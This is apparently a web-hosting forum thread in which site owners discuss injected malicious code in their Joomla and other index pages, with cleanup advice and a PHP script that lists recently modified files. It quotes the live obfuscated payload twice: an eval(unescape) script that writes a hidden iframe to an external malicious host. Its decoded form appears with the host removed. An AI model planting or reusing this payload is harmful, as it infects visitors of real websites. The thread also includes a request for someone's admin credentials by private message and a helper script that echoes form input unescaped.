i see in all my sites that have problem that was hacked - all the index.php or index.htm - added phishing code - that we can see warning in google chrome- do your sites also hacked?
chech your site by surfilng to your site with google chrome

Forget about Chrome for a second, what is you're site how do you know it's been hacked, are you using any appliaction for you're php pages Wordpress, joomla etc;. Give us a link and we'll judge if you've been hacked or not.

My site was also hacked (again). It is actually the third time it happens. Someone, or a robot (most likely a robot), is adding malicious code to all my index pages. The code is the following:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6 f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69% 74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d %61%34%36%39%31%20%73%72%63%3d%5c%27%68%74%74%70%3 a%2f%2f%7a%63%74%6b%2e%72%75%2f%6c%69%77%65%2f%3f% 74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28 %4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%3 1%38%39%38%29%2b%27%32%36%31%61%39%64%38%5c%27%20% 77%69%64%74%68%3d%32%36%37%20%68%65%69%67%68%74%3d %34%39%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72% 61%6d%65%3e%27%29")); </script>

I use Joomla, Gallery, and phpgedview. All of them are running the latest version. All of them are being hacked.

Any help would be greatly appreciated!

My site was also hacked (again). It is actually the third time it happens. Someone, or a robot (most likely a robot), is adding malicious code to all my index pages. The code is the following:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6 f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69% 74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d %61%34%36%39%31%20%73%72%63%3d%5c%27%68%74%74%70%3 a%2f%2f%7a%63%74%6b%2e%72%75%2f%6c%69%77%65%2f%3f% 74%3d%31%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28 %4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%33%3 1%38%39%38%29%2b%27%32%36%31%61%39%64%38%5c%27%20% 77%69%64%74%68%3d%32%36%37%20%68%65%69%67%68%74%3d %34%39%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72% 61%6d%65%3e%27%29")); </script>

I use Joomla, Gallery, and phpgedview. All of them are running the latest version. All of them are being hacked.

Any help would be greatly appreciated!

website: *** removed link to hacked site ***
(http://www.guigece.com)

The above code, decoded is this:



window.status='Done';document.write('<iframe name=a4691 src=\'http://***malicious site removed***/liwe/?t=1?'+Math.round(Math.random()*131898)+'261a9d8\' width=267 height=494 style=\'display: none\'></iframe>')


If you are indeed running the latest version of Joomla!, then I highly doubt Joomla! is the problem here. Your other components, Gallery and phpgedview are the places I would start looking for weak scripting. And of the two, phpgedview would be the suspicious one for me because Gallery is a component that seems to be popular enough, and is updated regularly enough that it would not be first on my list of culprits.

In fact, my very first recommendation to you would be to change both your admin username and password. I manage a site that kept getting hacked. It runs on the older verison of Joomla! (1.0.15) and was getting code inserted every hour or so. After some looking around, the problem was that the owner of the site was using the default admin username along with a very, VERY weak password. I told him to change both the username and the password, making the password a combination of upper and lower case letters and numbers. It would not hurt to add some special characters in there either.

After you do that, continue to monitor your site and see if the code keeps reappearing.

For future reference, please do not post active links to sites that contain malicious code. I don't want our users unknowingly clicking a link they will regret.

~regards


P.S. By the way, do you know how to get rid of the code? I can help you if you need the help, but you will need to pm me login information for your admin site.

~regards, again

In fact, my very first recommendation to you would be to change both your admin username and password.
Shad,
If you remember, this was happening to me quite a bit, until I changed my password per your advice. It has not happened since.
What I would like to know, other than replacing or editing the affected files, is there another way to get rid of the code for future reference?

If I recall, you are not running a Joomla! installation. In your case, you would log into your cPanel and use your File Manager to locate the affected file. Open said file for editing and remove any code that should not be there.

In the case of a Joomla! installation, you should log into the administrative back end and navigate to Extensions -> Template Manager. Put a mark in the radio button next to the active (default) template name and then click the Edit button (near top right of page). Then click on Edit HTML. This loads the main index.php file into an editable window. Here you should remove the malicious code, saving your changes when finished.

Kev, I'm glad to hear the password change solved your problem. I was wondering about the status of the change.

~regards

If I recall, you are not running a Joomla! installation. In your case, you would log into your cPanel and use your File Manager to locate the affected file. Open said file for editing and remove any code that should not be there.

In the case of a Joomla! installation, you should log into the administrative back end and navigate to Extensions -> Template Manager. Put a mark in the radio button next to the active (default) template name and then click the Edit button (near top right of page). Then click on Edit HTML. This loads the main index.php file into an editable window. Here you should remove the malicious code, saving your changes when finished.

Kev, I'm glad to hear the password change solved your problem. I was wondering about the status of the change.

~regards
You are correct that I am not running a Joomla installation.
Also, if the problem arises again in the future, I always have backups ready to go now. No more editing all my index files anymore.:D

Thanks for your reply, I will try to change my password (even though my password is a very good one, with upper and lower cases, numbers and special characters).

I am able to remove the code easily, the problem is that the code is imputed in all index files, which can turn out to be very time consuming.

Thanks for your reply, I will try to change my password (even though my password is a very good one, with upper and lower cases, numbers and special characters).

I am able to remove the code easily, the problem is that the code is imputed in all index files, which can turn out to be very time consuming.

Joomla! only uses one index file (the template index file). If the code for the index file is changed, those changes will be seen on every page Joomla! loads. If you are finding this malicious code in other content items inside Joomla!, then the code is being inserting into the database, in which case, your problem is not a weak password, but a security flaw in either Joomla! (doubtful) and/or one of your addon components.

If you are talking about all your index files throughout your entire site, even those pages outside of the Joomla! framework, then you should change your cPanel password.

As always, this is a good first place to start, but might not fix the problem completely.

~regards

There is a virus in your computer, that automatically connects to your hosting and adds those links in all your index files. You should get rid of the virus from your computer first, and then change the password for your hosting.
Good Luck.

There is a virus in your computer, that automatically connects to your hosting and adds those links in all your index files. You should get rid of the virus from your computer first, and then change the password for your hosting.
Good Luck.
MindHunter,
I find this very interesting because it's the first time I have ever heard of such a thing. Does this really happen? What virus causes that? I would like to know more about this if possible.

of course it possible but highly unlikely. the same way you complete a series of mouse clicks and keystrokes, the computer can "simulate" upon a given event. (time, keypress, application events etc.) for that matter if you are on broadband, and always have a connection, it could do it at anytime without "opening" a browser window even.

that is what firewalls are for. you should have one on your computer that needs your permission to allow access to both incoming requests and outgoing requests. for better security, make it always ask, then it cant exucute and run through a program you've already given permission to. like a "virus" that would get a password or just spam and open your mailer (mail is one of the biggest ones you should not let run whenever it wants) and poof.

ive heard a tip for spam viruses-
create a user named aaa@aaa.aaa or something like that. when the virus opens your phone book to send, you will know something happened because you will end up getting an error back

MindHunter,
I find this very interesting because it's the first time I have ever heard of such a thing. Does this really happen? What virus causes that? I would like to know more about this if possible.

Yes this is a very common type of attack. Its just that the FTP username & passwords are searched & transmitted to a central server. Search Google & you will finds loads of information on index file hacks. One very effective suggestion: Chmod 444 all your index files. Scan your PC & change FTP passwords.

a php file is an application. it will need execute rights

a php file is an application. it will need execute rights

Don't worry on that. It works & has worked for hundreds of people affected by index injection across hosts & CMS's including for me :-).So chmod 444 :)

Yes this is a very common type of attack. Its just that the FTP username & passwords are searched & transmitted to a central server. Search Google & you will finds loads of information on index file hacks. One very effective suggestion: Chmod 444 all your index files. Scan your PC & change FTP passwords.
Thanks for the info!

PHP is an application so a PHP executable would need execute. However when it comes to PHP actually parsing PHP files, it only needs read.

If shadmego is right then he's obviously brute force attacking you're site, i wouldn't even give him the option to go to www.mysite.com/administrator to try and guess my password what i would do is go here

http://extensions.joomla.org/extensions/access-&-security/site-security/5809/details

Works for both version of joomla, you can change the url into anything you want meaning he'll never see you're login panel again.

I had to deal with this crap for about 2 months on a corporate server housing multiple websites and finally figured out what it was. You and your sites have been exposed to an exploit called Gumblar.
Infected web pages will contain the script like you pasted above and will vary slightly from page to page.
How it got in was my concern, rather than what it did to users who visited my pages, and figured out that if a user who has ftp access to your webserver get affected from somewhere else, a malicious trojan steals the ftp credentials saved their computer and uses this to get into the ftp sites. So that how they got it.
To clean up -> change all ftp passwords and smoke out the culprit by handing over ftp credentials one at a time and watching your server for some time, check the logs (if they have not been deleted yet) and then clean up your files.
cleaning files -> look for the malicious code right before the <body> tag in your html/htm files. Look for the code (usually encoded in base64) in ur php files. Also look in your .js files usually at the very bottom to see if infected. and finally, look through your images folder for a file name image.php.jpg. Also check your .htaccess files for altered permissions.
Backup your web pages so in the event of an attack you will have files to restore as the clean up process can be time consuming when you are looking at over 4000 web pages....

this is code someone gave me (i cant remember who or i would give credit) that scans your files for files that have been modified in the last "n" days:


<?php
//-----------------------------------------------------------------------------
$start_folder = "/home/username/"; //put your cpanel username here
$Days = ($_POST["days"]) ? $_POST["days"]: "2";
//-----------------------------------------------------------------------------
$middle = choose($Days);
if($_POST["submit"])
{
$folder = $start_folder.trim($_POST["folder"], "/");
if(file_exists($folder))
{
$Test = date("Y-m-d H:i", time() - ($Days * 86400));
$files = find_files($folder, $Test);
$middle.= show_files($files);
}
else $middle.= "<div class='error_div'>folder: <b>$folder</b> - does not exist!</div>";
}
//-----------------------------------------------------------------------------
$start = html_start($middle);
$end = html_end();
print $start.$end;
//-----------------------------------------------------------------------------

//-----------------------------------------------------------------------------
function choose($Days)
{
global $start_folder;

$folder = $_POST["folder"];

$v = "<table class='choose_table'>";

$v.= "<tr>";
$v.= "<td colspan='3' class='choose_header_td'><h3>Find recently modified files</h3></td>";
$v.= "</tr>";

$v.= "<tr>";
$v.= "<td colspan='3'>&nbsp;</td>";
$v.= "</tr>";

$v.= "<tr>";
$v.= "<td class='choose_name_td'>look in <b>$start_folder</b></td>";
$v.= "<td class='choose_input_td'><input type='text' name='folder' value='$folder' class='choose_input'></td>";
$v.= "<td class='choose_last_td'>/</td>";
$v.= "</tr>";

$v.= "<tr>";
$v.= "<td class='choose_name_td'>list files modified within last</td>";
$v.= "<td class='choose_input_td'><input type='text' name='days' value='$Days' class='choose_input'></td>";
$v.= "<td class='choose_last_td'>days</td>";
$v.= "</tr>";

$v.= "<tr>";
$v.= "<td class='choose_name_td'></td>";
$v.= "<td colspan='2' class='choose_submit_td'><input type='submit' name='submit' value='start search'></td>";
$v.= "</tr>";

$v.= "</table>";

return $v;
}
//-----------------------------------------------------------------------------
function find_files($Folder, $Test)
{
global $start_folder;

$v = array();

$dir = scandir($Folder);
foreach($dir as $file) {


if($file=="." || $file=="..") continue;
$current = "$Folder/$file";

if(is_dir($current))
{
$v = array_merge($v, find_files($current, $Test));
continue;
}

$stat = stat($current);
$mtime = date("Y-m-d H:i", $stat["mtime"]);
$ctime = date("Y-m-d H:i", $stat["ctime"]);

if(strcmp($Test, $mtime) >=0 ) continue;

$one["File"] = $file;
$one["Location"] = substr($current, strlen($start_folder));
$one["Ctime"] = $ctime;
$one["Mtime"] = $mtime;

$v[$current] = $one;


}

return $v;
}
//-----------------------------------------------------------------------------
function show_files($Files)
{
global $numfiles;
$numfiles=0;
ksort($Files);
foreach($Files as $path => $data)
{
$sufix = ($par = !$par) ? "_par": "";
extract($data);

$tds = "<td class='list_file_td'>$File</td>";
$tds.= "<td class='list_location_td'>$Location</td>";
$tds.= "<td class='list_time_td'>$Mtime</td>";
$tds.= "<td class='list_time_td'>$Ctime</td>";

$trs.= "<tr class='list_tr$sufix'>$tds</tr>";
$numfiles++;
}

$header = "<tr>";
$header.= "<td class='list_header_td'>file</td>";
$header.= "<td class='list_header_td'>location</td>";
$header.= "<td class='list_header_td'>modified</td>";
$header.= "<td class='list_header_td'>created</td>";
$header.= "</tr>";

$v = "<table class='list_table'>";
$v.= $header;
$v.= $trs;
$v.= "</table>";

return $v;
}
//-----------------------------------------------------------------------------
//-----------------------------------------------------------------------------
function html_start($middle)
{
$v = "<style>table{width:100%;border-collapse:collapse;}
.main_td{width:1000px;}
.error_div{border:2px solid #770000;background:#ddcc33;padding:20px;width:80%; color:#770000;}
.choose_table{margin-top:20px;margin-bottom:20px;border:1px solid #777777;background:#fafafa;}
.choose_name_td{text-align:right;padding:3px;padding-right:10px;width:30%;}
.choose_input_td{width:1px;}
.choose_input{width:97%;border:1px solid #777777;padding-top:3px;padding-bottom:3px;padding-left:5px;color:#555555;font-weight:bold;}
.choose_submit_td{padding:5px;padding-left:0px;}
.choose_last_td{padding:3px;padding-left:10px;width:30%;}
.choose_header_td{padding:5px;text-align:center;font-weight:bold;border-bottom:2px solid orange;}
.list_table{border:1px solid #777777;background:#f9f9f9;margin-bottom:20px;}
.list_file_td{font-weight:bold;padding:3px;padding-left:10px;}
.list_location_td{padding:3px;padding-left:10px;}
.list_time_td{padding:3px;padding-left: 10px;}
.list_header_td{padding:5px;padding-left: 10px;font-weight: bold;border-bottom:2px solid orange;}
.list_tr_par{background:white;}
.list_tr:hover{background:#ffcc33;}
.list_tr_par:hover{background:#ffcc33;}</style>
";
$v.= "<form name='forma' method='POST' action=''>";
$v.= "<table>";
$v.= "<tr>";
$v.= "<td></td>";
$v.= "<td class='main_td'>$middle</td>";
$v.= "<td></td>";
$v.= "</tr>";
$v.= "</table>";
return $v;
}
//-----------------------------------------------------------------------------
function html_end()
{
$v.= "</form>";
$v.= "</body></html>";
return $v;
}
//-----------------------------------------------------------------------------
?>